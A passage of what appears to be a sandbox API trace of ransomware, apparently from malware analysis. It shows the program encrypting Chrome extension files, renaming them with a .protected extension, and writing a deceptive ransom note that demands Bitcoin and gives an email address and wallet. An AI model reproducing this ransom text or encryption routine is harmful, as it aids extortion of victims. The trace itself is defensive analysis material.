(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.188] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.188] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.188] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.188] CloseHandle (hObject=0x164) returned 1 [0080.188] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.188] lstrcmpiW (lpString1="tr", lpString2="Windows") returned -1 [0080.188] lstrcmpiW (lpString1="tr", lpString2="Program Files") returned 1 [0080.188] lstrcmpiW (lpString1="tr", lpString2="Program Files (x86)") returned 1 [0080.188] lstrcmpiW (lpString1="tr", lpString2="$Recycle.bin") returned 1 [0080.188] lstrcmpiW (lpString1="tr", lpString2="System Volume Information") returned 1 [0080.188] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr") returned 141 [0080.188] lstrcmpW (lpString1="tr", lpString2=".") returned 1 [0080.188] lstrcmpW (lpString1="tr", lpString2="..") returned 1 [0080.188] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\*") returned 143 [0080.188] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.188] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.188] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.188] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.188] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.188] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.188] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\.") returned 143 [0080.188] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.188] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.189] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.189] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.189] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.189] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.189] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.189] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\..") returned 144 [0080.189] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.189] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.189] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.189] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.189] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.189] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.189] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.189] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.189] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json") returned 155 [0080.189] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.189] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.189] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.189] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.189] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json") returned 155 [0080.189] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.190] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json") returned 155 [0080.190] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.190] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json") returned 155 [0080.190] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.190] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe1, lpOverlapped=0x0) returned 1 [0080.190] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.190] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe1, lpOverlapped=0x0) returned 1 [0080.190] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.191] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.191] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.191] CloseHandle (hObject=0x168) returned 1 [0080.191] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.protected") returned 165 [0080.191] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.protected")) returned 1 [0080.192] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.192] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.192] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\RESTORE_FILES.txt") returned 159 [0080.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.194] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.194] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.196] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.196] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.196] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.196] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.196] CloseHandle (hObject=0x164) returned 1 [0080.197] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.197] lstrcmpiW (lpString1="uk", lpString2="Windows") returned -1 [0080.197] lstrcmpiW (lpString1="uk", lpString2="Program Files") returned 1 [0080.197] lstrcmpiW (lpString1="uk", lpString2="Program Files (x86)") returned 1 [0080.197] lstrcmpiW (lpString1="uk", lpString2="$Recycle.bin") returned 1 [0080.197] lstrcmpiW (lpString1="uk", lpString2="System Volume Information") returned 1 [0080.197] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk") returned 141 [0080.197] lstrcmpW (lpString1="uk", lpString2=".") returned 1 [0080.197] lstrcmpW (lpString1="uk", lpString2="..") returned 1 [0080.197] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\*") returned 143 [0080.197] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.197] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.197] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.197] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.197] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.197] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.197] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\.") returned 143 [0080.197] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.197] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.197] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.197] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.197] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.198] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.198] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.198] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\..") returned 144 [0080.198] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.198] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.198] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.198] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.198] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.198] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.198] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.198] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.198] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json") returned 155 [0080.198] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.198] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.198] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.198] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json") returned 155 [0080.199] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json") returned 155 [0080.199] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json") returned 155 [0080.199] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.199] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0080.200] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.200] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0080.200] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.200] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.200] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.200] CloseHandle (hObject=0x168) returned 1 [0080.200] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.protected") returned 165 [0080.200] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.protected")) returned 1 [0080.201] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.201] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.201] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\RESTORE_FILES.txt") returned 159 [0080.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.202] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.202] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.202] lstrlenA 